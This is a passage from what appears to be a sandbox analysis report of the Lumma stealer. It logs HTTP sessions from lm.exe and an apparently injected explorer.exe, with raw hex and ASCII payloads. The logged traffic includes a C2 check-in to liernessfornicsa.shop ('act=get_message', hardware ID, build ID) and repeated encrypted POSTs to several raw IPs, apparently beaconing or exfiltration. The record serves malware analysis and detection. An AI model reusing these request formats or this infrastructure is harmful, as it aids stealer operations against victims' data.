2024-07-27 06:55:05 UTC	685	IN	Data Raw: 5a 6f 2b 32 64 4a 76 62 47 47 35 67 6d 4f 64 63 53 37 54 37 31 65 64 54 6e 35 68 58 6c 59 6f 6e 64 65 35 31 6a 44 73 77 68 62 6c 70 55 7a 79 4b 39 2f 2f 51 58 4e 43 5a 46 44 6f 46 49 57 33 73 50 2f 4f 47 61 63 38 42 62 53 48 56 41 6b 33 56 79 63 50 50 46 4d 4a 32 39 69 39 62 48 33 61 35 37 74 62 41 54 75 64 57 33 74 73 71 4b 39 59 39 79 70 7a 2f 65 51 7a 69 49 73 78 72 2b 4d 6b 35 61 75 59 64 53 51 7a 37 55 52 44 50 41 68 64 74 37 61 6f 76 52 50 50 55 78 7a 59 36 62 76 6f 56 74 6e 62 39 46 69 66 76 64 2f 6d 4b 2b 65 31 67 52 63 56 67 67 67 55 5a 75 5a 5a 38 5a 6e 66 51 4d 42 42 36 51 6d 6d 4a 41 4e 54 72 75 51 79 50 36 44 30 42 2b 55 4d 6c 48 43 2f 6b 45 6b 51 57 45 6a 37 58 78 45 72 62 41 59 56 6f 4b 4f 46 66 33 5a 73 34 63 52 6c 47 4b 57 50 74 76 6c 38 Data Ascii: Zo+2dJvbGG5gmOdcS7T71edTn5hXlYonde51jDswhblpUzyK9//QXNCZFDoFIW3sP/OGac8BbSHVAk3VycPPFMJ29i9bH3a57tbATudW3tsqK9Y9ypz/eQziIsxr+Mk5auYdSQz7URDPAhdt7aovRPPUxzY6bvoVtnb9Fifvd/mK+e1gRcVgggUZuZZ8ZnfQMBB6QmmJANTruQyP6D0B+UMlHC/kEkQWEj7XxErbAYVoKOFf3Zs4cRlGKWPtvl8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50759	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:05 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: liernessfornicsa.shop
2024-07-27 06:55:05 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 Data Ascii: act=get_message&ver=4.0&lid=qToYrJ--&j=&hwid=8DA5CA009AFDFC139AE80332C094968D
2024-07-27 06:55:06 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:55:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=976l2c5dhrje3ohep89thj32ab; expires=Wed, 20-Nov-2024 00:41:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5tfzADgoRLVYbGLS2CtnkYzVka4expp2zqTXqDw%2FBhrNKbRnZ129sJRE%2F9AolYKLx%2FkHD76hlpoT3aKTecVySl3mkkkJHTG37r3PkdQJK4Ev2n2znHg%2FRld4pWsGIcd2xFTKyQv5I8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab8cacddd425b-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:55:06 UTC	54	IN	Data Raw: 33 30 0d 0a 34 4c 44 70 32 35 36 34 77 61 51 72 71 37 63 70 31 4f 65 53 34 44 64 32 4f 4f 4e 4d 61 43 69 37 67 77 69 2f 34 43 2b 74 37 2f 2b 37 37 51 3d 3d 0d 0a Data Ascii: 304LDp2564waQrq7cp1OeS4Dd2OONMaCi7gwi/4C+t7/+77Q==
2024-07-27 06:55:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50760	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:06 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:06 UTC	1122	OUT	Data Raw: 42 6a 37 63 46 66 52 43 72 6b 78 45 54 46 76 56 39 72 35 6d 4a 4b 77 39 6c 72 30 37 54 54 52 45 2b 5a 45 75 67 64 50 54 34 71 4c 4f 43 50 6e 66 69 69 2f 48 2b 51 42 4e 57 50 53 6c 70 76 6f 47 39 6c 6f 75 37 4b 41 6a 5a 71 50 52 72 32 41 4d 35 58 66 79 65 59 78 54 7a 41 57 64 49 45 6f 50 77 46 54 57 4c 6d 64 4c 62 34 52 5a 61 65 65 46 79 79 4c 4b 45 38 66 48 57 4e 68 4b 7a 53 59 53 4b 2f 2f 6c 4d 53 6e 35 65 4c 50 46 6b 43 36 36 34 65 30 62 63 56 45 44 4c 79 30 74 44 71 6f 30 41 45 36 49 72 38 59 51 49 71 63 6d 49 77 6e 6f 72 68 37 57 72 56 78 4f 53 62 68 35 77 4e 78 4e 46 30 74 6f 65 4b 47 37 64 4a 53 6e 4e 51 62 4a 6f 34 4a 6f 70 43 71 2f 39 62 31 66 6c 79 4a 4d 32 68 33 36 75 39 70 48 4a 45 6c 75 69 6f 35 6c 69 30 74 48 6a 64 48 5a 66 6f 74 48 4e 34 6d Data Ascii: Bj7cFfRCrkxETFvV9r5mJKw9lr07TTRE+ZEugdPT4qLOCPnfii/H+QBNWPSlpvoG9lou7KAjZqPRr2AM5XfyeYxTzAWdIEoPwFTWLmdLb4RZaeeFyyLKE8fHWNhKzSYSK//lMSn5eLPFkC664e0bcVEDLy0tDqo0AE6Ir8YQIqcmIwnorh7WrVxOSbh5wNxNF0toeKG7dJSnNQbJo4JopCq/9b1flyJM2h36u9pHJEluio5li0tHjdHZfotHN4m
2024-07-27 06:55:07 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:07 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:07 UTC	685	IN	Data Raw: 4a 6e 54 68 64 6c 57 35 61 47 75 6f 62 2f 69 70 4c 38 6a 41 4e 6c 35 37 38 32 37 50 6b 33 6a 4f 6c 75 76 66 4b 78 56 4e 75 35 57 66 53 6d 48 4a 7a 2f 72 61 2f 6c 32 56 32 52 63 59 76 6e 39 55 34 78 58 70 56 37 55 61 33 4c 6d 59 4c 59 74 58 73 52 6f 56 51 4e 31 4a 76 49 5a 43 52 75 2b 73 48 79 31 6b 77 64 33 68 6b 7a 6b 6d 4b 69 4c 6e 64 33 65 62 59 6b 6f 79 64 32 63 65 62 42 74 58 62 77 36 33 2b 2f 52 72 56 65 54 44 44 49 59 4d 30 49 41 47 53 76 2b 31 70 39 73 6c 49 58 69 50 70 4c 79 33 72 2f 74 41 77 76 54 31 47 42 78 6a 66 67 49 4b 6d 67 45 34 6d 6b 33 77 7a 79 6e 63 43 79 44 41 73 55 75 70 31 30 7a 74 61 37 69 32 65 58 47 64 5a 57 56 65 45 4f 53 5a 4c 4d 38 51 68 57 64 30 76 5a 75 33 5a 59 6c 7a 56 33 76 6c 6a 6a 52 51 68 4a 6c 73 55 56 6f 62 37 43 44 Data Ascii: JnThdlW5aGuob/ipL8jANl57827Pk3jOluvfKxVNu5WfSmHJz/ra/l2V2RcYvn9U4xXpV7Ua3LmYLYtXsRoVQN1JvIZCRu+sHy1kwd3hkzkmKiLnd3ebYkoyd2cebBtXbw63+/RrVeTDDIYM0IAGSv+1p9slIXiPpLy3r/tAwvT1GBxjfgIKmgE4mk3wzyncCyDAsUup10zta7i2eXGdZWVeEOSZLM8QhWd0vZu3ZYlzV3vljjRQhJlsUVob7CD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50762	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:08 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:08 UTC	1122	OUT	Data Raw: 52 67 79 62 32 31 46 41 64 6b 68 4e 75 51 38 72 32 6a 48 63 4e 4a 4c 47 78 50 49 6d 6e 34 67 75 73 44 42 41 56 55 30 2b 55 39 53 59 6e 4a 69 36 4e 70 4f 49 2f 50 4f 49 46 61 48 2b 44 38 34 49 36 7a 68 37 6a 48 79 46 74 59 4a 6c 39 4e 77 48 57 53 5a 6d 50 53 45 4f 31 4b 4f 6f 33 2b 38 48 53 47 64 6e 77 2f 34 51 41 31 64 73 6a 6c 52 6c 62 58 63 6a 79 64 78 30 6a 6e 32 6a 46 39 57 78 6b 58 67 33 4e 41 5a 41 55 52 61 6f 50 36 46 41 66 68 4f 63 49 66 2b 45 6f 79 77 34 6f 6f 4c 49 33 4b 48 64 4a 74 30 6d 58 6d 77 6c 6d 30 35 6d 6d 56 33 2f 51 31 74 38 6b 34 4d 59 77 38 46 79 43 59 41 44 43 69 30 6e 4e 75 45 79 73 52 78 76 4d 61 62 6a 37 61 32 6e 72 79 69 58 6e 76 6a 43 49 50 44 6d 34 7a 76 58 67 73 57 53 4b 45 63 68 49 76 56 6d 41 49 6c 77 54 4a 62 6c 68 6c 67 Data Ascii: Rgyb21FAdkhNuQ8r2jHcNJLGxPImn4gusDBAVU0+U9SYnJi6NpOI/POIFaH+D84I6zh7jHyFtYJl9NwHWSZmPSEO1KOo3+8HSGdnw/4QA1dsjlRlbXcjydx0jn2jF9WxkXg3NAZAURaoP6FAfhOcIf+Eoyw4ooLI3KHdJt0mXmwlm05mmV3/Q1t8k4MYw8FyCYADCi0nNuEysRxvMabj7a2nryiXnvjCIPDm4zvXgsWSKEchIvVmAIlwTJblhlg
2024-07-27 06:55:09 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:09 UTC	685	IN	Data Raw: 68 6f 55 4b 45 51 4a 32 53 59 4d 54 4e 46 49 30 67 77 54 77 30 72 65 74 5a 31 67 49 75 4f 6c 66 47 4f 43 4d 4b 4c 56 77 65 39 46 4c 77 6c 7a 54 35 49 55 6c 6b 66 2b 46 4f 59 36 57 66 2b 46 58 69 62 76 78 50 43 30 69 73 59 4e 37 4f 56 45 57 6d 68 53 78 67 57 73 4d 61 6c 67 77 4d 76 54 63 31 33 42 30 77 30 61 47 4c 61 47 4b 73 6f 48 55 62 34 6a 55 4a 4d 32 45 6b 30 55 57 5a 5a 6f 76 45 6a 61 66 67 6c 35 6a 39 51 54 39 6c 33 78 4b 4f 65 74 35 61 6f 63 64 77 7a 52 47 56 34 69 2b 73 58 44 61 6e 42 74 7a 63 6b 35 5a 57 78 65 59 7a 6a 33 30 71 72 55 2f 35 46 79 4b 56 50 51 37 6a 65 72 6f 59 6d 65 64 30 2b 69 37 6a 71 53 66 63 79 4c 76 45 43 74 57 42 4c 46 65 59 4d 33 78 38 79 44 72 43 74 6f 67 46 52 63 79 38 71 47 37 53 44 58 48 53 6d 30 55 36 73 68 77 48 76 43 Data Ascii: hoUKEQJ2SYMTNFI0gwTw0retZ1gIuOlfGOCMKLVwe9FLwlzT5IUlkf+FOY6Wf+FXibvxPC0isYN7OVEWmhSxgWsMalgwMvTc13B0w0aGLaGKsoHUb4jUJM2Ek0UWZZovEjafgl5j9QT9l3xKOet5aocdwzRGV4i+sXDanBtzck5ZWxeYzj30qrU/5FyKVPQ7jeroYmed0+i7jqSfcyLvECtWBLFeYM3x8yDrCtogFRcy8qG7SDXHSm0U6shwHvC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50763	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:10 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:10 UTC	1122	OUT	Data Raw: 71 6d 50 57 77 37 38 45 49 70 59 67 6d 47 79 56 67 6e 4f 39 4d 59 69 7a 52 57 43 57 75 67 30 78 79 63 49 56 42 4e 6f 31 2f 44 57 59 39 4a 35 46 46 4d 51 32 69 4f 77 4d 6b 6e 56 42 43 2b 79 77 46 79 78 42 64 69 50 6d 6b 49 77 47 75 4d 32 74 30 30 51 4d 66 7a 39 47 75 54 30 71 2b 4f 38 6b 78 37 68 5a 47 46 59 4a 6a 2f 31 53 4e 57 34 57 4d 6a 6e 6e 78 69 56 30 67 61 4c 6d 6e 51 31 2f 46 4a 69 36 30 36 64 34 76 57 67 32 2f 30 64 38 43 59 6a 6f 7a 71 7a 46 65 53 63 6b 4c 35 57 2b 6f 41 7a 53 5a 4b 70 62 67 4b 44 45 55 61 2b 49 45 77 6d 54 7a 6d 79 77 67 52 6e 36 44 43 39 72 74 48 67 6a 6f 70 73 61 6a 6a 4f 67 46 39 79 4b 34 7a 4d 4a 52 61 43 57 41 70 64 35 68 4e 67 48 47 67 39 39 32 30 49 4d 52 4f 38 74 38 36 4f 50 51 45 6d 42 6e 59 2f 67 33 35 2f 53 2f 42 67 Data Ascii: qmPWw78EIpYgmGyVgnO9MYizRWCWug0xycIVBNo1/DWY9J5FFMQ2iOwMknVBC+ywFyxBdiPmkIwGuM2t00QMfz9GuT0q+O8kx7hZGFYJj/1SNW4WMjnnxiV0gaLmnQ1/FJi606d4vWg2/0d8CYjozqzFeSckL5W+oAzSZKpbgKDEUa+IEwmTzmywgRn6DC9rtHgjopsajjOgF9yK4zMJRaCWApd5hNgHGg9920IMRO8t86OPQEmBnY/g35/S/Bg
2024-07-27 06:55:11 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:11 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:11 UTC	685	IN	Data Raw: 46 2b 6e 34 4f 51 74 4c 4e 35 54 4e 41 79 6d 69 41 4c 6a 34 69 67 74 64 6e 70 73 36 52 70 2f 56 41 6c 41 52 36 67 4f 64 47 32 2f 6e 6f 79 75 66 72 4e 75 61 63 37 34 65 36 61 4a 4f 34 64 65 43 7a 34 64 7a 68 55 71 41 57 30 35 2f 5a 66 78 56 4d 69 68 4f 6b 65 74 72 33 46 50 54 50 36 41 34 43 6e 70 73 31 63 64 47 61 56 37 4d 41 66 7a 4c 4b 66 7a 47 76 31 6b 33 45 54 79 34 44 7a 66 48 32 66 74 43 77 5a 67 70 73 51 36 64 66 56 54 63 73 55 4b 6d 2b 61 62 46 6a 6e 49 58 64 4d 4b 2b 4d 76 51 65 44 34 2f 6c 73 78 54 4a 5a 4b 54 57 66 31 35 53 75 6d 64 53 6c 50 47 36 43 76 35 48 57 78 6e 49 49 51 66 43 41 45 75 41 54 58 54 31 48 64 65 67 53 30 2f 43 77 4b 79 61 52 57 66 33 59 6f 66 57 4e 38 64 4a 6d 2f 45 31 76 42 34 6d 55 39 56 69 75 35 4b 51 48 4b 4d 65 56 73 32 Data Ascii: F+n4OQtLN5TNAymiALj4igtdnps6Rp/VAlAR6gOdG2/noyufrNuac74e6aJO4deCz4dzhUqAW05/ZfxVMihOketr3FPTP6A4Cnps1cdGaV7MAfzLKfzGv1k3ETy4DzfH2ftCwZgpsQ6dfVTcsUKm+abFjnIXdMK+MvQeD4/lsxTJZKTWf15SumdSlPG6Cv5HWxnIIQfCAEuATXT1HdegS0/CwKyaRWf3YofWN8dJm/E1vB4mU9Viu5KQHKMeVs2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50765	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:12 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:12 UTC	1122	OUT	Data Raw: 6c 53 41 38 2f 6c 50 42 36 62 7a 74 51 30 32 63 56 75 42 38 79 39 73 36 2b 57 47 34 59 6e 4b 76 6c 59 42 39 2f 32 51 49 45 4c 68 44 34 4b 51 73 49 38 72 37 54 38 52 49 76 42 56 51 32 52 61 79 2f 59 6f 54 36 74 45 78 36 54 77 2b 64 76 77 6f 69 79 69 63 54 2f 56 37 39 48 7a 70 55 58 72 43 7a 35 55 4f 6b 4e 53 56 45 76 51 2f 2f 32 4f 79 72 48 61 47 50 54 41 61 4d 35 4c 33 4d 57 55 48 65 67 4a 48 31 45 42 4e 70 4c 50 61 68 70 46 69 31 38 4c 33 5a 30 79 52 2b 38 6f 4c 6f 78 4b 71 32 57 43 45 42 6c 52 33 43 2b 47 49 4d 65 4a 46 6e 62 34 74 6f 4b 70 63 38 48 76 64 45 2b 37 6c 58 68 68 6c 70 50 61 64 55 47 61 46 58 45 59 6b 6c 68 2f 51 56 74 53 59 30 6b 42 37 32 4d 58 62 67 63 79 6d 67 6a 4f 43 79 61 35 68 66 4b 6d 52 44 30 4c 76 6d 44 5a 51 2b 65 4a 4f 34 33 34 Data Ascii: lSA8/lPB6bztQ02cVuB8y9s6+WG4YnKvlYB9/2QIELhD4KQsI8r7T8RIvBVQ2Ray/YoT6tEx6Tw+dvwoiyicT/V79HzpUXrCz5UOkNSVEvQ//2OyrHaGPTAaM5L3MWUHegJH1EBNpLPahpFi18L3Z0yR+8oLoxKq2WCEBlR3C+GIMeJFnb4toKpc8HvdE+7lXhhlpPadUGaFXEYklh/QVtSY0kB72MXbgcymgjOCya5hfKmRD0LvmDZQ+eJO434
2024-07-27 06:55:13 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:13 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:13 UTC	685	IN	Data Raw: 62 54 61 6a 2f 6e 52 6d 4a 58 44 33 4a 79 70 4e 50 4a 6a 30 62 48 39 67 71 2f 55 49 73 63 57 64 67 47 4c 38 50 4e 50 53 61 66 70 6a 2b 64 43 59 6d 47 70 4f 69 47 2b 49 41 43 47 71 52 70 64 77 38 39 4b 73 2f 54 68 6a 4d 76 5a 4a 64 6c 61 38 42 53 45 30 32 58 4f 50 61 73 4c 70 51 7a 4c 77 77 39 56 74 35 4b 57 31 54 6e 42 67 79 6b 38 77 78 5a 4e 4e 4c 59 37 44 64 6b 35 44 2b 63 33 78 6a 46 74 36 43 63 4b 78 39 6b 36 75 42 32 78 6c 4b 56 6f 65 4a 59 55 50 5a 78 4e 34 74 54 57 35 4e 37 66 4b 4b 74 36 7a 58 4a 35 62 47 63 4b 6a 5a 63 35 6a 42 78 4d 4e 52 46 61 6c 49 47 50 52 46 2f 6c 32 44 4b 48 59 71 61 4f 6d 6b 59 47 4e 4d 4d 74 5a 75 4e 43 48 5a 33 6a 51 4d 46 51 56 48 67 42 56 77 34 6f 4c 63 77 76 37 43 62 46 4c 35 61 41 68 36 75 61 57 4c 67 36 36 67 41 32 Data Ascii: bTaj/nRmJXD3JypNPJj0bH9gq/UIscWdgGL8PNPSafpj+dCYmGpOiG+IACGqRpdw89Ks/ThjMvZJdla8BSE02XOPasLpQzLww9Vt5KW1TnBgyk8wxZNNLY7Ddk5D+c3xjFt6CcKx9k6uB2xlKVoeJYUPZxN4tTW5N7fKKt6zXJ5bGcKjZc5jBxMNRFalIGPRF/l2DKHYqaOmkYGNMMtZuNCHZ3jQMFQVHgBVw4oLcwv7CbFL5aAh6uaWLg66gA2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50768	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:14 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:14 UTC	1122	OUT	Data Raw: 43 78 71 6c 56 46 49 69 4c 38 6c 53 2b 37 49 51 72 65 6b 31 43 47 4d 69 51 31 66 35 32 34 35 46 4e 75 6b 6b 43 47 73 47 6c 52 58 54 4a 49 41 56 76 2f 43 6f 49 72 35 56 4c 6b 48 58 78 33 6f 61 67 6e 6a 33 6c 4f 77 56 49 4a 4d 6b 57 69 49 43 39 67 41 56 62 65 4f 58 47 4c 57 78 65 4c 68 62 46 52 78 2b 58 6f 54 68 47 49 55 69 32 65 63 6e 6f 6a 72 35 41 39 30 71 54 46 31 63 70 67 7a 39 76 32 63 61 2b 6f 73 64 4c 51 4c 50 39 77 43 6d 71 79 44 46 62 49 38 44 54 61 61 51 55 6e 68 4b 77 48 30 64 4e 63 45 37 45 6a 78 41 76 63 59 38 45 30 45 78 7a 70 67 4c 6f 33 7a 63 67 6c 66 76 2f 55 64 57 64 77 4a 70 67 6a 34 41 4f 6c 67 70 6d 53 61 72 53 51 2f 76 4d 76 4b 49 47 62 64 6c 68 50 78 78 57 45 51 4e 59 58 43 58 59 31 4e 78 4c 68 56 72 78 4c 59 56 4b 32 63 34 50 30 6c Data Ascii: CxqlVFIiL8lS+7IQrek1CGMiQ1f5245FNukkCGsGlRXTJIAVv/CoIr5VLkHXx3oagnj3lOwVIJMkWiIC9gAVbeOXGLWxeLhbFRx+XoThGIUi2ecnojr5A90qTF1cpgz9v2ca+osdLQLP9wCmqyDFbI8DTaaQUnhKwH0dNcE7EjxAvcY8E0ExzpgLo3zcglfv/UdWdwJpgj4AOlgpmSarSQ/vMvKIGbdlhPxxWEQNYXCXY1NxLhVrxLYVK2c4P0l
2024-07-27 06:55:15 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:15 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:15 UTC	685	IN	Data Raw: 42 64 79 6d 56 6e 52 4a 4a 6b 6e 6a 2b 5a 72 73 50 61 70 6e 5a 52 62 53 48 6f 77 39 49 52 59 53 58 53 67 62 47 6e 51 73 6a 4f 41 36 6a 74 2b 2b 68 31 56 7a 61 61 74 31 4a 4a 6e 44 71 45 4c 30 7a 78 66 39 52 72 31 62 55 6f 46 43 56 6a 56 79 45 2f 4d 74 6d 4f 4a 33 7a 76 36 6d 47 2b 66 6f 45 36 6d 51 37 32 59 49 47 77 75 52 59 66 54 73 33 6b 79 76 66 42 52 77 43 4d 7a 71 4e 6c 6f 33 63 57 43 6d 68 7a 35 66 73 30 37 56 65 46 68 62 2b 44 6a 35 4d 6b 33 65 63 2f 35 4b 37 77 53 4a 42 30 77 50 48 77 47 51 77 6b 4d 78 30 46 41 38 59 2b 49 34 34 52 4a 39 4d 6b 4a 4c 33 50 65 77 72 4e 47 6f 5a 48 48 45 54 2f 73 62 6e 76 71 64 43 63 39 57 47 38 4b 6b 31 6a 38 73 7a 56 6d 62 49 2f 70 39 2f 69 5a 58 4f 71 58 4f 4f 44 39 4b 79 69 2f 38 6f 54 57 66 73 4b 78 33 6f 6a 55 Data Ascii: BdymVnRJJknj+ZrsPapnZRbSHow9IRYSXSgbGnQsjOA6jt++h1Vzaat1JJnDqEL0zxf9Rr1bUoFCVjVyE/MtmOJ3zv6mG+foE6mQ72YIGwuRYfTs3kyvfBRwCMzqNlo3cWCmhz5fs07VeFhb+Dj5Mk3ec/5K7wSJB0wPHwGQwkMx0FA8Y+I44RJ9MkJL3PewrNGoZHHET/sbnvqdCc9WG8Kk1j8szVmbI/p9/iZXOqXOOD9Kyi/8oTWfsKx3ojU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50770	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:16 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:16 UTC	1122	OUT	Data Raw: 44 52 73 49 37 63 67 79 75 6f 4f 74 4e 6d 63 6d 59 30 53 31 6c 2f 39 67 37 54 68 38 2b 73 44 31 72 57 37 30 42 35 65 37 54 54 62 58 38 76 31 32 4b 52 72 72 6e 47 4c 6f 4f 7a 50 50 41 45 38 4a 78 73 74 50 51 48 33 49 58 73 66 77 41 56 67 4a 34 46 31 73 52 49 34 37 70 77 46 33 61 74 51 59 70 6d 2f 74 30 59 31 71 34 55 59 45 66 35 72 46 36 59 55 4b 6d 5a 32 57 33 37 46 4e 71 39 4a 4c 36 4e 77 52 44 49 59 74 49 51 54 2f 42 49 55 37 5a 59 63 66 73 76 6d 6e 64 67 6c 62 6d 50 61 74 72 6c 44 68 35 53 2b 49 73 57 48 4f 6e 71 54 42 78 62 75 70 67 39 39 58 32 79 4b 75 56 53 51 31 51 34 75 69 35 6d 4f 63 30 62 56 65 43 6b 6c 77 2f 35 76 43 47 33 57 57 76 50 79 37 35 74 56 62 76 42 68 75 51 64 56 46 47 39 53 77 45 74 6c 78 66 38 43 42 31 39 44 4f 33 6e 31 57 75 52 36 Data Ascii: DRsI7cgyuoOtNmcmY0S1l/9g7Th8+sD1rW70B5e7TTbX8v12KRrrnGLoOzPPAE8JxstPQH3IXsfwAVgJ4F1sRI47pwF3atQYpm/t0Y1q4UYEf5rF6YUKmZ2W37FNq9JL6NwRDIYtIQT/BIU7ZYcfsvmndglbmPatrlDh5S+IsWHOnqTBxbupg99X2yKuVSQ1Q4ui5mOc0bVeCklw/5vCG3WWvPy75tVbvBhuQdVFG9SwEtlxf8CB19DO3n1WuR6
2024-07-27 06:55:18 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:18 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:18 UTC	685	IN	Data Raw: 4d 6b 6e 37 42 56 43 4c 6a 62 62 7a 4f 58 6a 74 38 50 79 51 7a 48 44 4b 66 61 43 52 4a 65 71 6d 33 32 70 36 51 62 45 6c 73 7a 72 4d 32 61 47 6b 53 4e 57 4e 43 47 4c 41 4d 4e 79 76 63 58 32 7a 6b 42 69 6d 37 43 65 30 74 38 2b 54 6c 42 52 63 45 6e 31 6d 57 72 51 42 64 32 68 44 52 61 4e 49 52 48 79 50 58 76 44 38 5a 76 69 50 67 2b 62 4e 35 4a 54 6b 6a 53 47 73 70 66 36 6a 49 31 66 5a 55 54 59 55 59 76 65 5a 38 46 73 67 66 53 42 72 52 76 66 75 57 32 57 4e 51 44 57 44 6d 45 6f 65 6a 2b 6e 4c 41 42 78 6d 36 37 79 4e 36 77 55 34 44 56 77 73 67 34 4a 4e 58 41 54 4b 6c 36 33 33 50 52 55 35 5a 55 32 71 50 59 70 52 55 4c 4b 66 74 33 69 61 69 4b 63 63 4a 2f 68 79 6e 36 47 4f 6b 43 6e 38 2f 6d 6d 76 49 6f 30 44 70 56 67 37 59 39 6c 57 79 4b 74 2b 7a 56 4e 75 42 42 54 Data Ascii: Mkn7BVCLjbbzOXjt8PyQzHDKfaCRJeqm32p6QbElszrM2aGkSNWNCGLAMNyvcX2zkBim7Ce0t8+TlBRcEn1mWrQBd2hDRaNIRHyPXvD8ZviPg+bN5JTkjSGspf6jI1fZUTYUYveZ8FsgfSBrRvfuW2WNQDWDmEoej+nLABxm67yN6wU4DVwsg4JNXATKl633PRU5ZU2qPYpRULKft3iaiKccJ/hyn6GOkCn8/mmvIo0DpVg7Y9lWyKt+zVNuBBT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50773	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:18 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
